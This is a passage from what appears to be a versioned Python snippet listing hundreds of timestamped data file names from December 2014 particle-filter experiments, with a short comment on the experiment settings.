'data3Wed_Dec_31_00_38_52_2014.txt',\n 'data3Wed_Dec_31_00_39_07_2014.txt',\n 'data3Wed_Dec_31_00_39_22_2014.txt',\n 'data3Wed_Dec_31_00_39_36_2014.txt',\n 'data3Wed_Dec_31_00_39_51_2014.txt',\n 'data3Wed_Dec_31_00_40_06_2014.txt',\n 'data3Wed_Dec_31_00_40_21_2014.txt',\n 'data3Wed_Dec_31_00_40_36_2014.txt',\n 'data3Wed_Dec_31_00_40_50_2014.txt',\n 'data3Wed_Dec_31_00_41_05_2014.txt',\n 'data3Wed_Dec_31_00_41_20_2014.txt',\n 'data3Wed_Dec_31_00_41_34_2014.txt',\n 'data3Wed_Dec_31_00_41_50_2014.txt',\n 'data3Wed_Dec_31_00_42_04_2014.txt',\n 'data3Wed_Dec_31_00_42_19_2014.txt',\n 'data3Wed_Dec_31_00_42_33_2014.txt',\n 'data3Wed_Dec_31_00_42_48_2014.txt',\n 'data3Wed_Dec_31_00_43_03_2014.txt',\n 'data3Wed_Dec_31_00_43_18_2014.txt',\n 'data3Wed_Dec_31_00_43_33_2014.txt',\n 'data3Wed_Dec_31_00_43_48_2014.txt',\n 'data3Wed_Dec_31_00_44_03_2014.txt',\n 'data3Wed_Dec_31_00_44_18_2014.txt',\n 'data3Wed_Dec_31_00_44_33_2014.txt',\n 'data3Wed_Dec_31_00_44_48_2014.txt',\n 'data3Wed_Dec_31_00_45_03_2014.txt',\n 'data3Wed_Dec_31_00_45_18_2014.txt',\n 'data3Wed_Dec_31_00_45_33_2014.txt',\n 'data3Wed_Dec_31_00_45_48_2014.txt',\n 'data3Wed_Dec_31_00_46_03_2014.txt',\n 'data3Wed_Dec_31_00_46_18_2014.txt', 'data3Wed_Dec_31_00_46_32_2014.txt']\n",
"step-3": "# this is for the 12/30/2015 experiments\n# varied over 1, 10, 25, 50, 100 repeat particles per particle\n# 10000 particles total per filter\n# bias is at 0.8 in both the \"real\" world (realWorld.cpp)\n\nfiles = ['data0Tue_Dec_30_20_37_34_2014.txt',\n'data0Tue_Dec_30_20_37_49_2014.txt',\n'data0Tue_Dec_30_20_38_04_2014.txt',\n'data0Tue_Dec_30_20_38_19_2014.txt',\n'data0Tue_Dec_30_20_38_34_2014.txt',\n'data0Tue_Dec_30_20_38_49_2014.txt',\n'data0Tue_Dec_30_20_39_04_2014.txt',\n'data0Tue_Dec_30_20_39_19_2014.txt',\n'data0Tue_Dec_30_20_39_34_2014.txt',\n'data0Tue_Dec_30_20_39_49_2014.txt',\n'data0Tue_Dec_30_20_40_04_2014.txt',\n'data0Tue_Dec_30_20_40_19_2014.txt',\n'data0Tue_Dec_30_20_40_34_2014.txt',\n'data0Tue_Dec_30_20_40_49_2014.txt',\n'data0Tue_Dec_30_20_41_04_2014.txt',\n'data0Tue_Dec_30_20_41_18_2014.txt',\n'data0Tue_Dec_30_20_41_34_2014.txt',\n'data0Tue_Dec_30_20_41_49_2014.txt',\n'data0Tue_Dec_30_20_42_04_2014.txt',\n'data0Tue_Dec_30_20_42_19_2014.txt',\n'data0Tue_Dec_30_20_42_34_2014.txt',\n'data0Tue_Dec_30_20_42_49_2014.txt',\n'data0Tue_Dec_30_20_43_04_2014.txt',\n'data0Tue_Dec_30_20_43_19_2014.txt',\n'data0Tue_Dec_30_20_43_34_2014.txt',\n'data0Tue_Dec_30_20_43_49_2014.txt',\n'data0Tue_Dec_30_20_44_04_2014.txt',\n'data0Tue_Dec_30_20_44_19_2014.txt',\n'data0Tue_Dec_30_20_44_34_2014.txt',\n'data0Tue_Dec_30_20_44_49_2014.txt',\n'data0Tue_Dec_30_20_45_04_2014.txt',\n'data0Tue_Dec_30_20_45_19_2014.txt',\n'data0Tue_Dec_30_20_45_34_2014.txt',\n'data0Tue_Dec_30_20_45_49_2014.txt',\n'data0Tue_Dec_30_20_46_04_2014.txt',\n'data0Tue_Dec_30_20_46_19_2014.txt',\n'data0Tue_Dec_30_20_46_34_2014.txt',\n'data0Tue_Dec_30_20_46_49_2014.txt',\n'data0Tue_Dec_30_20_47_04_2014.txt',\n'data0Tue_Dec_30_20_47_19_2014.txt',\n'data0Tue_Dec_30_20_47_34_2014.txt',\n'data0Tue_Dec_30_20_47_50_2014.txt',\n'data0Tue_Dec_30_20_48_05_2014.txt',\n'data0Tue_Dec_30_20_48_20_2014.txt',\n'data0Tue_Dec_30_20_48_35_2014.txt',\n'data0Tue_Dec_30_20_48_50_2014.txt',\n'data0Tue_Dec_30_20_49_05_2
014.txt',\n'data0Tue_Dec_30_20_49_20_2014.txt',\n'data0Tue_Dec_30_20_49_35_2014.txt',\n'data0Tue_Dec_30_20_49_50_2014.txt',\n'data1Tue_Dec_30_20_50_05_2014.txt',\n'data1Tue_Dec_30_20_50_20_2014.txt',\n'data1Tue_Dec_30_20_50_35_2014.txt',\n'data1Tue_Dec_30_20_50_50_2014.txt',\n'data1Tue_Dec_30_20_51_05_2014.txt',\n'data1Tue_Dec_30_20_51_20_2014.txt',\n'data1Tue_Dec_30_20_51_35_2014.txt',\n'data1Tue_Dec_30_20_51_50_2014.txt',\n'data1Tue_Dec_30_20_52_05_2014.txt',\n'data1Tue_Dec_30_20_52_20_2014.txt',\n'data1Tue_Dec_30_20_52_35_2014.txt',\n'data1Tue_Dec_30_20_52_50_2014.txt',\n'data1Tue_Dec_30_20_53_05_2014.txt',\n'data1Tue_Dec_30_20_53_20_2014.txt',\n'data1Tue_Dec_30_20_53_35_2014.txt',\n'data1Tue_Dec_30_20_53_50_2014.txt',\n'data1Tue_Dec_30_20_54_04_2014.txt',\n'data1Tue_Dec_30_20_54_19_2014.txt',\n'data1Tue_Dec_30_20_54_34_2014.txt',\n'data1Tue_Dec_30_20_54_49_2014.txt',\n'data1Tue_Dec_30_20_55_04_2014.txt',\n'data1Tue_Dec_30_20_55_19_2014.txt',\n'data1Tue_Dec_30_20_55_34_2014.txt',\n'data1Tue_Dec_30_20_55_49_2014.txt',\n'data1Tue_Dec_30_20_56_04_2014.txt',\n'data1Tue_Dec_30_20_56_19_2014.txt',\n'data1Tue_Dec_30_20_56_34_2014.txt',\n'data1Tue_Dec_30_20_56_49_2014.txt',\n'data1Tue_Dec_30_20_57_04_2014.txt',\n'data1Tue_Dec_30_20_57_19_2014.txt',\n'data1Tue_Dec_30_20_57_33_2014.txt',\n'data1Tue_Dec_30_20_57_48_2014.txt',\n'data1Tue_Dec_30_20_58_03_2014.txt',\n'data1Tue_Dec_30_20_58_18_2014.txt',\n'data1Tue_Dec_30_20_58_33_2014.txt',\n'data1Tue_Dec_30_20_58_48_2014.txt',\n'data1Tue_Dec_30_20_59_03_2014.txt',\n'data1Tue_Dec_30_20_59_18_2014.txt',\n'data1Tue_Dec_30_20_59_33_2014.txt',\n'data1Tue_Dec_30_20_59_48_2014.txt',\n'data1Tue_Dec_30_21_00_03_2014.txt',\n'data1Tue_Dec_30_21_00_17_2014.txt',\n'data1Tue_Dec_30_21_00_32_2014.txt',\n'data1Tue_Dec_30_21_00_47_2014.txt',\n'data1Tue_Dec_30_21_01_02_2014.txt',\n'data1Tue_Dec_30_21_01_17_2014.txt',\n'data1Tue_Dec_30_21_01_32_2014.txt',\n'data1Tue_Dec_30_21_01_47_2014.txt',\n'data1Tue_Dec_30_21_02_03_2014.txt',\n'data1Tue_Dec
_30_21_02_17_2014.txt',\n'data2Tue_Dec_30_21_02_32_2014.txt',\n'data2Tue_Dec_30_21_02_47_2014.txt',\n'data2Tue_Dec_30_21_03_02_2014.txt',\n'data2Tue_Dec_30_21_03_17_2014.txt',\n'data2Tue_Dec_30_21_03_32_2014.txt',\n'data2Tue_Dec_30_21_03_47_2014.txt',\n'data2Tue_Dec_30_21_04_02_2014.txt',\n'data2Tue_Dec_30_21_04_17_2014.txt',\n'data2Tue_Dec_30_21_04_31_2014.txt',\n'data2Tue_Dec_30_21_04_46_2014.txt',\n'data2Tue_Dec_30_21_05_01_2014.txt',\n'data2Tue_Dec_30_21_05_16_2014.txt',\n'data2Tue_Dec_30_21_05_31_2014.txt',\n'data2Tue_Dec_30_21_05_45_2014.txt',\n'data2Tue_Dec_30_21_06_00_2014.txt',\n'data2Tue_Dec_30_21_06_16_2014.txt',\n'data2Tue_Dec_30_21_06_31_2014.txt',\n'data2Tue_Dec_30_21_06_46_2014.txt',\n'data2Tue_Dec_30_21_07_01_2014.txt',\n'data2Tue_Dec_30_21_07_16_2014.txt',\n'data2Tue_Dec_30_21_07_31_2014.txt',\n'data2Tue_Dec_30_21_07_46_2014.txt',\n'data2Tue_Dec_30_21_08_01_2014.txt',\n'data2Tue_Dec_30_21_08_16_2014.txt',\n'data2Tue_Dec_30_21_08_30_2014.txt',\n'data2Tue_Dec_30_21_08_45_2014.txt',\n'data2Tue_Dec_30_21_09_01_2014.txt',\n'data2Tue_Dec_30_21_09_16_2014.txt',\n'data2Tue_Dec_30_21_09_31_2014.txt',\n'data2Tue_Dec_30_21_09_46_2014.txt',\n'data2Tue_Dec_30_21_10_00_2014.txt',\n'data2Tue_Dec_30_21_10_16_2014.txt',\n'data2Tue_Dec_30_21_10_31_2014.txt',\n'data2Tue_Dec_30_21_10_45_2014.txt',\n'data2Tue_Dec_30_21_11_00_2014.txt',\n'data2Tue_Dec_30_21_11_16_2014.txt',\n'data2Tue_Dec_30_21_11_31_2014.txt',\n'data2Tue_Dec_30_21_11_45_2014.txt',\n'data2Tue_Dec_30_21_12_01_2014.txt',\n'data2Tue_Dec_30_21_12_16_2014.txt',\n'data2Tue_Dec_30_21_12_31_2014.txt',\n'data2Tue_Dec_30_21_12_46_2014.txt',\n'data2Tue_Dec_30_21_13_00_2014.txt',\n'data2Tue_Dec_30_21_13_15_2014.txt',\n'data2Tue_Dec_30_21_13_31_2014.txt',\n'data2Tue_Dec_30_21_13_46_2014.txt',\n'data2Tue_Dec_30_21_14_00_2014.txt',\n'data2Tue_Dec_30_21_14_15_2014.txt',\n'data2Tue_Dec_30_21_14_30_2014.txt',\n'data2Tue_Dec_30_21_14_45_2014.txt',\n'data3Tue_Dec_30_21_15_00_2014.txt',\n'data3Tue_Dec_30_21_15_15_2014.txt',\
n'data3Tue_Dec_30_21_15_29_2014.txt',\n'data3Tue_Dec_30_21_15_44_2014.txt',\n'data3Tue_Dec_30_21_15_59_2014.txt',\n'data3Tue_Dec_30_21_16_15_2014.txt',\n'data3Tue_Dec_30_21_16_30_2014.txt',\n'data3Tue_Dec_30_21_16_44_2014.txt',\n'data3Tue_Dec_30_21_16_59_2014.txt',\n'data3Tue_Dec_30_21_17_15_2014.txt',\n'data3Tue_Dec_30_21_17_29_2014.txt',\n'data3Tue_Dec_30_21_17_45_2014.txt',\n'data3Tue_Dec_30_21_18_00_2014.txt',\n'data3Tue_Dec_30_21_18_15_2014.txt',\n'data3Tue_Dec_30_21_18_29_2014.txt',\n'data3Tue_Dec_30_21_18_44_2014.txt',\n'data3Tue_Dec_30_21_18_59_2014.txt',\n'data3Tue_Dec_30_21_19_14_2014.txt',\n'data3Tue_Dec_30_21_19_29_2014.txt',\n'data3Tue_Dec_30_21_19_44_2014.txt',\n'data3Tue_Dec_30_21_19_59_2014.txt',\n'data3Tue_Dec_30_21_20_14_2014.txt',\n'data3Tue_Dec_30_21_20_29_2014.txt',\n'data3Tue_Dec_30_21_20_45_2014.txt',\n'data3Tue_Dec_30_21_21_00_2014.txt',\n'data3Tue_Dec_30_21_21_15_2014.txt',\n'data3Tue_Dec_30_21_21_30_2014.txt',\n'data3Tue_Dec_30_21_21_45_2014.txt',\n'data3Tue_Dec_30_21_21_59_2014.txt',\n'data3Tue_Dec_30_21_22_14_2014.txt',\n'data3Tue_Dec_30_21_22_29_2014.txt',\n'data3Tue_Dec_30_21_22_44_2014.txt',\n'data3Tue_Dec_30_21_22_58_2014.txt',\n'data3Tue_Dec_30_21_23_14_2014.txt',\n'data3Tue_Dec_30_21_23_28_2014.txt',\n'data3Tue_Dec_30_21_23_43_2014.txt',\n'data3Tue_Dec_30_21_23_58_2014.txt',\n'data3Tue_Dec_30_21_24_13_2014.txt',\n'data3Tue_Dec_30_21_24_28_2014.txt',\n'data3Tue_Dec_30_21_24_43_2014.txt',\n'data3Tue_Dec_30_21_24_58_2014.txt',\n'data3Tue_Dec_30_21_25_12_2014.txt',\n'data3Tue_Dec_30_21_25_28_2014.txt',\n'data3Tue_Dec_30_21_25_43_2014.txt',\n'data3Tue_Dec_30_21_25_58_2014.txt',\n'data3Tue_Dec_30_21_26_12_2014.txt',\n'data3Tue_Dec_30_21_26_27_2014.txt',\n'data3Tue_Dec_30_21_26_42_2014.txt',\n'data3Tue_Dec_30_21_26_57_2014.txt',\n'data3Tue_Dec_30_21_27_12_2014.txt',\n'data0Tue_Dec_30_21_27_52_2014.txt',\n'data0Tue_Dec_30_21_28_07_2014.txt',\n'data0Tue_Dec_30_21_28_22_2014.txt',\n'data0Tue_Dec_30_21_28_37_2014.txt',\n'data0Tue_Dec_30_21_28_
51_2014.txt',\n'data0Tue_Dec_30_21_29_06_2014.txt',\n'data0Tue_Dec_30_21_29_21_2014.txt',\n'data0Tue_Dec_30_21_29_36_2014.txt',\n'data0Tue_Dec_30_21_29_51_2014.txt',\n'data0Tue_Dec_30_21_30_06_2014.txt',\n'data0Tue_Dec_30_21_30_21_2014.txt',\n'data0Tue_Dec_30_21_30_36_2014.txt',\n'data0Tue_Dec_30_21_30_50_2014.txt',\n'data0Tue_Dec_30_21_31_06_2014.txt',\n'data0Tue_Dec_30_21_31_21_2014.txt',\n'data0Tue_Dec_30_21_31_36_2014.txt',\n'data0Tue_Dec_30_21_31_51_2014.txt',\n'data0Tue_Dec_30_21_32_06_2014.txt',\n'data0Tue_Dec_30_21_32_21_2014.txt',\n'data0Tue_Dec_30_21_32_36_2014.txt',\n'data0Tue_Dec_30_21_32_51_2014.txt',\n'data0Tue_Dec_30_21_33_05_2014.txt',\n'data0Tue_Dec_30_21_33_20_2014.txt',\n'data0Tue_Dec_30_21_33_35_2014.txt',\n'data0Tue_Dec_30_21_33_50_2014.txt',\n'data0Tue_Dec_30_21_34_05_2014.txt',\n'data0Tue_Dec_30_21_34_20_2014.txt',\n'data0Tue_Dec_30_21_34_34_2014.txt',\n'data0Tue_Dec_30_21_34_49_2014.txt',\n'data0Tue_Dec_30_21_35_04_2014.txt',\n'data0Tue_Dec_30_21_35_20_2014.txt',\n'data0Tue_Dec_30_21_35_35_2014.txt',\n'data0Tue_Dec_30_21_35_49_2014.txt',\n'data0Tue_Dec_30_21_36_04_2014.txt',\n'data0Tue_Dec_30_21_36_19_2014.txt',\n'data0Tue_Dec_30_21_36_34_2014.txt',\n'data0Tue_Dec_30_21_36_49_2014.txt',\n'data0Tue_Dec_30_21_37_04_2014.txt',\n'data0Tue_Dec_30_21_37_19_2014.txt',\n'data0Tue_Dec_30_21_37_34_2014.txt',\n'data0Tue_Dec_30_21_37_49_2014.txt',\n'data0Tue_Dec_30_21_38_04_2014.txt',\n'data0Tue_Dec_30_21_38_18_2014.txt',\n'data0Tue_Dec_30_21_38_33_2014.txt',\n'data0Tue_Dec_30_21_38_48_2014.txt',\n'data0Tue_Dec_30_21_39_03_2014.txt',\n'data0Tue_Dec_30_21_39_18_2014.txt',\n'data0Tue_Dec_30_21_39_33_2014.txt',\n'data0Tue_Dec_30_21_39_48_2014.txt',\n'data0Tue_Dec_30_21_40_02_2014.txt',\n'data1Tue_Dec_30_21_40_18_2014.txt',\n'data1Tue_Dec_30_21_40_33_2014.txt',\n'data1Tue_Dec_30_21_40_48_2014.txt',\n'data1Tue_Dec_30_21_41_02_2014.txt',\n'data1Tue_Dec_30_21_41_17_2014.txt',\n'data1Tue_Dec_30_21_41_31_2014.txt',\n'data1Tue_Dec_30_21_41_46_2014.txt',\n'data1Tue
_Dec_30_21_42_01_2014.txt',\n'data1Tue_Dec_30_21_42_16_2014.txt',\n'data1Tue_Dec_30_21_42_31_2014.txt',\n'data1Tue_Dec_30_21_42_46_2014.txt',\n'data1Tue_Dec_30_21_43_01_2014.txt',\n'data1Tue_Dec_30_21_43_16_2014.txt',\n'data1Tue_Dec_30_21_43_31_2014.txt',\n'data1Tue_Dec_30_21_43_46_2014.txt',\n'data1Tue_Dec_30_21_44_01_2014.txt',\n'data1Tue_Dec_30_21_44_15_2014.txt',\n'data1Tue_Dec_30_21_44_30_2014.txt',\n'data1Tue_Dec_30_21_44_46_2014.txt',\n'data1Tue_Dec_30_21_45_01_2014.txt',\n'data1Tue_Dec_30_21_45_15_2014.txt',\n'data1Tue_Dec_30_21_45_30_2014.txt',\n'data1Tue_Dec_30_21_45_45_2014.txt',\n'data1Tue_Dec_30_21_46_00_2014.txt',\n'data1Tue_Dec_30_21_46_15_2014.txt',\n'data1Tue_Dec_30_21_46_29_2014.txt',\n'data1Tue_Dec_30_21_46_44_2014.txt',\n'data1Tue_Dec_30_21_46_59_2014.txt',\n'data1Tue_Dec_30_21_47_14_2014.txt',\n'data1Tue_Dec_30_21_47_29_2014.txt',\n'data1Tue_Dec_30_21_47_44_2014.txt',\n'data1Tue_Dec_30_21_47_59_2014.txt',\n'data1Tue_Dec_30_21_48_13_2014.txt',\n'data1Tue_Dec_30_21_48_28_2014.txt',\n'data1Tue_Dec_30_21_48_43_2014.txt',\n'data1Tue_Dec_30_21_48_58_2014.txt',\n'data1Tue_Dec_30_21_49_13_2014.txt',\n'data1Tue_Dec_30_21_49_28_2014.txt',\n'data1Tue_Dec_30_21_49_43_2014.txt',\n'data1Tue_Dec_30_21_49_57_2014.txt',\n'data1Tue_Dec_30_21_50_13_2014.txt',\n'data1Tue_Dec_30_21_50_27_2014.txt',\n'data1Tue_Dec_30_21_50_42_2014.txt',\n'data1Tue_Dec_30_21_50_57_2014.txt',\n'data1Tue_Dec_30_21_51_12_2014.txt',\n'data1Tue_Dec_30_21_51_27_2014.txt',\n'data1Tue_Dec_30_21_51_42_2014.txt',\n'data1Tue_Dec_30_21_51_56_2014.txt',\n'data1Tue_Dec_30_21_52_11_2014.txt',\n'data1Tue_Dec_30_21_52_26_2014.txt',\n'data2Tue_Dec_30_21_52_40_2014.txt',\n'data2Tue_Dec_30_21_52_55_2014.txt',\n'data2Tue_Dec_30_21_53_10_2014.txt',\n'data2Tue_Dec_30_21_53_25_2014.txt',\n'data2Tue_Dec_30_21_53_40_2014.txt',\n'data2Tue_Dec_30_21_53_54_2014.txt',\n'data2Tue_Dec_30_21_54_09_2014.txt',\n'data2Tue_Dec_30_21_54_24_2014.txt',\n'data2Tue_Dec_30_21_54_39_2014.txt',\n'data2Tue_Dec_30_21_54_53_2014.tx
t',\n'data2Tue_Dec_30_21_55_08_2014.txt',\n'data2Tue_Dec_30_21_55_23_2014.txt',\n'data2Tue_Dec_30_21_55_38_2014.txt',\n'data2Tue_Dec_30_21_55_53_2014.txt',\n'data2Tue_Dec_30_21_56_08_2014.txt',\n'data2Tue_Dec_30_21_56_23_2014.txt',\n'data2Tue_Dec_30_21_56_37_2014.txt',\n'data2Tue_Dec_30_21_56_52_2014.txt',\n'data2Tue_Dec_30_21_57_07_2014.txt',\n'data2Tue_Dec_30_21_57_22_2014.txt',\n'data2Tue_Dec_30_21_57_37_2014.txt',\n'data2Tue_Dec_30_21_57_51_2014.txt',\n'data2Tue_Dec_30_21_58_06_2014.txt',\n'data2Tue_Dec_30_21_58_21_2014.txt',\n'data2Tue_Dec_30_21_58_35_2014.txt',\n'data2Tue_Dec_30_21_58_50_2014.txt',\n'data2Tue_Dec_30_21_59_05_2014.txt',\n'data2Tue_Dec_30_21_59_20_2014.txt',\n'data2Tue_Dec_30_21_59_34_2014.txt',\n'data2Tue_Dec_30_21_59_50_2014.txt',\n'data2Tue_Dec_30_22_00_05_2014.txt',\n'data2Tue_Dec_30_22_00_19_2014.txt',\n'data2Tue_Dec_30_22_00_34_2014.txt',\n'data2Tue_Dec_30_22_00_49_2014.txt',\n'data2Tue_Dec_30_22_01_03_2014.txt',\n'data2Tue_Dec_30_22_01_18_2014.txt',\n'data2Tue_Dec_30_22_01_33_2014.txt',\n'data2Tue_Dec_30_22_01_48_2014.txt',\n'data2Tue_Dec_30_22_02_03_2014.txt',\n'data2Tue_Dec_30_22_02_18_2014.txt',\n'data2Tue_Dec_30_22_02_32_2014.txt',\n'data2Tue_Dec_30_22_02_47_2014.txt',\n'data2Tue_Dec_30_22_03_02_2014.txt',\n'data2Tue_Dec_30_22_03_17_2014.txt',\n'data2Tue_Dec_30_22_03_31_2014.txt',\n'data2Tue_Dec_30_22_03_46_2014.txt',\n'data2Tue_Dec_30_22_04_01_2014.txt',\n'data2Tue_Dec_30_22_04_15_2014.txt',\n'data2Tue_Dec_30_22_04_30_2014.txt',\n'data2Tue_Dec_30_22_04_45_2014.txt',\n'data3Tue_Dec_30_22_05_00_2014.txt',\n'data3Tue_Dec_30_22_05_15_2014.txt',\n'data3Tue_Dec_30_22_05_30_2014.txt',\n'data3Tue_Dec_30_22_05_44_2014.txt',\n'data3Tue_Dec_30_22_06_00_2014.txt',\n'data3Tue_Dec_30_22_06_14_2014.txt',\n'data3Tue_Dec_30_22_06_29_2014.txt',\n'data3Tue_Dec_30_22_06_44_2014.txt',\n'data3Tue_Dec_30_22_06_59_2014.txt',\n'data3Tue_Dec_30_22_07_14_2014.txt',\n'data3Tue_Dec_30_22_07_29_2014.txt',\n'data3Tue_Dec_30_22_07_43_2014.txt',\n'data3Tue_Dec_30_22
_07_58_2014.txt',\n'data3Tue_Dec_30_22_08_13_2014.txt',\n'data3Tue_Dec_30_22_08_28_2014.txt',\n'data3Tue_Dec_30_22_08_43_2014.txt',\n'data3Tue_Dec_30_22_08_57_2014.txt',\n'data3Tue_Dec_30_22_09_12_2014.txt',\n'data3Tue_Dec_30_22_09_27_2014.txt',\n'data3Tue_Dec_30_22_09_42_2014.txt',\n'data3Tue_Dec_30_22_09_57_2014.txt',\n'data3Tue_Dec_30_22_10_12_2014.txt',\n'data3Tue_Dec_30_22_10_26_2014.txt',\n'data3Tue_Dec_30_22_10_41_2014.txt',\n'data3Tue_Dec_30_22_10_56_2014.txt',\n'data3Tue_Dec_30_22_11_11_2014.txt',\n'data3Tue_Dec_30_22_11_25_2014.txt',\n'data3Tue_Dec_30_22_11_41_2014.txt',\n'data3Tue_Dec_30_22_11_56_2014.txt',\n'data3Tue_Dec_30_22_12_11_2014.txt',\n'data3Tue_Dec_30_22_12_26_2014.txt',\n'data3Tue_Dec_30_22_12_40_2014.txt',\n'data3Tue_Dec_30_22_12_55_2014.txt',\n'data3Tue_Dec_30_22_13_10_2014.txt',\n'data3Tue_Dec_30_22_13_25_2014.txt',\n'data3Tue_Dec_30_22_13_40_2014.txt',\n'data3Tue_Dec_30_22_13_55_2014.txt',\n'data3Tue_Dec_30_22_14_09_2014.txt',\n'data3Tue_Dec_30_22_14_24_2014.txt',\n'data3Tue_Dec_30_22_14_39_2014.txt',\n'data3Tue_Dec_30_22_14_53_2014.txt',\n'data3Tue_Dec_30_22_15_08_2014.txt',\n'data3Tue_Dec_30_22_15_23_2014.txt',\n'data3Tue_Dec_30_22_15_37_2014.txt',\n'data3Tue_Dec_30_22_15_52_2014.txt',\n'data3Tue_Dec_30_22_16_07_2014.txt',\n'data3Tue_Dec_30_22_16_22_2014.txt',\n'data3Tue_Dec_30_22_16_36_2014.txt',\n'data3Tue_Dec_30_22_16_51_2014.txt',\n'data3Tue_Dec_30_22_17_06_2014.txt',\n'data0Tue_Dec_30_22_17_47_2014.txt',\n'data0Tue_Dec_30_22_18_01_2014.txt',\n'data0Tue_Dec_30_22_18_16_2014.txt',\n'data0Tue_Dec_30_22_18_31_2014.txt',\n'data0Tue_Dec_30_22_18_46_2014.txt',\n'data0Tue_Dec_30_22_19_01_2014.txt',\n'data0Tue_Dec_30_22_19_15_2014.txt',\n'data0Tue_Dec_30_22_19_30_2014.txt',\n'data0Tue_Dec_30_22_19_45_2014.txt',\n'data0Tue_Dec_30_22_20_00_2014.txt',\n'data0Tue_Dec_30_22_20_15_2014.txt',\n'data0Tue_Dec_30_22_20_30_2014.txt',\n'data0Tue_Dec_30_22_20_44_2014.txt',\n'data0Tue_Dec_30_22_20_59_2014.txt',\n'data0Tue_Dec_30_22_21_14_2014.txt',\n'data
0Tue_Dec_30_22_21_29_2014.txt',\n'data0Tue_Dec_30_22_21_44_2014.txt',\n'data0Tue_Dec_30_22_21_58_2014.txt',\n'data0Tue_Dec_30_22_22_13_2014.txt',\n'data0Tue_Dec_30_22_22_28_2014.txt',\n'data0Tue_Dec_30_22_22_43_2014.txt',\n'data0Tue_Dec_30_22_22_58_2014.txt',\n'data0Tue_Dec_30_22_23_12_2014.txt',\n'data0Tue_Dec_30_22_23_27_2014.txt',\n'data0Tue_Dec_30_22_23_42_2014.txt',\n'data0Tue_Dec_30_22_23_57_2014.txt',\n'data0Tue_Dec_30_22_24_12_2014.txt',\n'data0Tue_Dec_30_22_24_26_2014.txt',\n'data0Tue_Dec_30_22_24_41_2014.txt',\n'data0Tue_Dec_30_22_24_56_2014.txt',\n'data0Tue_Dec_30_22_25_11_2014.txt',\n'data0Tue_Dec_30_22_25_25_2014.txt',\n'data0Tue_Dec_30_22_25_41_2014.txt',\n'data0Tue_Dec_30_22_25_55_2014.txt',\n'data0Tue_Dec_30_22_26_10_2014.txt',\n'data0Tue_Dec_30_22_26_25_2014.txt',\n'data0Tue_Dec_30_22_26_39_2014.txt',\n'data0Tue_Dec_30_22_26_54_2014.txt',\n'data0Tue_Dec_30_22_27_09_2014.txt',\n'data0Tue_Dec_30_22_27_24_2014.txt',\n'data0Tue_Dec_30_22_27_39_2014.txt',\n'data0Tue_Dec_30_22_27_54_2014.txt',\n'data0Tue_Dec_30_22_28_09_2014.txt',\n'data0Tue_Dec_30_22_28_23_2014.txt',\n'data0Tue_Dec_30_22_28_38_2014.txt',\n'data0Tue_Dec_30_22_28_53_2014.txt',\n'data0Tue_Dec_30_22_29_08_2014.txt',\n'data0Tue_Dec_30_22_29_23_2014.txt',\n'data0Tue_Dec_30_22_29_37_2014.txt',\n'data0Tue_Dec_30_22_29_52_2014.txt',\n'data1Tue_Dec_30_22_30_07_2014.txt',\n'data1Tue_Dec_30_22_30_21_2014.txt',\n'data1Tue_Dec_30_22_30_36_2014.txt',\n'data1Tue_Dec_30_22_30_51_2014.txt',\n'data1Tue_Dec_30_22_31_06_2014.txt',\n'data1Tue_Dec_30_22_31_20_2014.txt',\n'data1Tue_Dec_30_22_31_35_2014.txt',\n'data1Tue_Dec_30_22_31_49_2014.txt',\n'data1Tue_Dec_30_22_32_04_2014.txt',\n'data1Tue_Dec_30_22_32_19_2014.txt',\n'data1Tue_Dec_30_22_32_34_2014.txt',\n'data1Tue_Dec_30_22_32_48_2014.txt',\n'data1Tue_Dec_30_22_33_03_2014.txt',\n'data1Tue_Dec_30_22_33_18_2014.txt',\n'data1Tue_Dec_30_22_33_33_2014.txt',\n'data1Tue_Dec_30_22_33_48_2014.txt',\n'data1Tue_Dec_30_22_34_03_2014.txt',\n'data1Tue_Dec_30_22_34_17_201
4.txt',\n'data1Tue_Dec_30_22_34_32_2014.txt',\n'data1Tue_Dec_30_22_34_47_2014.txt',\n'data1Tue_Dec_30_22_35_01_2014.txt',\n'data1Tue_Dec_30_22_35_16_2014.txt',\n'data1Tue_Dec_30_22_35_31_2014.txt',\n'data1Tue_Dec_30_22_35_46_2014.txt',\n'data1Tue_Dec_30_22_36_01_2014.txt',\n'data1Tue_Dec_30_22_36_16_2014.txt',\n'data1Tue_Dec_30_22_36_30_2014.txt',\n'data1Tue_Dec_30_22_36_45_2014.txt',\n'data1Tue_Dec_30_22_37_00_2014.txt',\n'data1Tue_Dec_30_22_37_15_2014.txt',\n'data1Tue_Dec_30_22_37_30_2014.txt',\n'data1Tue_Dec_30_22_37_44_2014.txt',\n'data1Tue_Dec_30_22_37_59_2014.txt',\n'data1Tue_Dec_30_22_38_14_2014.txt',\n'data1Tue_Dec_30_22_38_28_2014.txt',\n'data1Tue_Dec_30_22_38_44_2014.txt',\n'data1Tue_Dec_30_22_38_58_2014.txt',\n'data1Tue_Dec_30_22_39_13_2014.txt',\n'data1Tue_Dec_30_22_39_28_2014.txt',\n'data1Tue_Dec_30_22_39_42_2014.txt',\n'data1Tue_Dec_30_22_39_57_2014.txt',\n'data1Tue_Dec_30_22_40_13_2014.txt',\n'data1Tue_Dec_30_22_40_27_2014.txt',\n'data1Tue_Dec_30_22_40_41_2014.txt',\n'data1Tue_Dec_30_22_40_56_2014.txt',\n'data1Tue_Dec_30_22_41_11_2014.txt',\n'data1Tue_Dec_30_22_41_26_2014.txt',\n'data1Tue_Dec_30_22_41_41_2014.txt',\n'data1Tue_Dec_30_22_41_56_2014.txt',\n'data1Tue_Dec_30_22_42_10_2014.txt',\n'data2Tue_Dec_30_22_42_25_2014.txt',\n'data2Tue_Dec_30_22_42_40_2014.txt',\n'data2Tue_Dec_30_22_42_54_2014.txt',\n'data2Tue_Dec_30_22_43_09_2014.txt',\n'data2Tue_Dec_30_22_43_24_2014.txt',\n'data2Tue_Dec_30_22_43_39_2014.txt',\n'data2Tue_Dec_30_22_43_53_2014.txt',\n'data2Tue_Dec_30_22_44_08_2014.txt',\n'data2Tue_Dec_30_22_44_23_2014.txt',\n'data2Tue_Dec_30_22_44_37_2014.txt',\n'data2Tue_Dec_30_22_44_52_2014.txt',\n'data2Tue_Dec_30_22_45_06_2014.txt',\n'data2Tue_Dec_30_22_45_21_2014.txt',\n'data2Tue_Dec_30_22_45_36_2014.txt',\n'data2Tue_Dec_30_22_45_50_2014.txt',\n'data2Tue_Dec_30_22_46_05_2014.txt',\n'data2Tue_Dec_30_22_46_20_2014.txt',\n'data2Tue_Dec_30_22_46_35_2014.txt',\n'data2T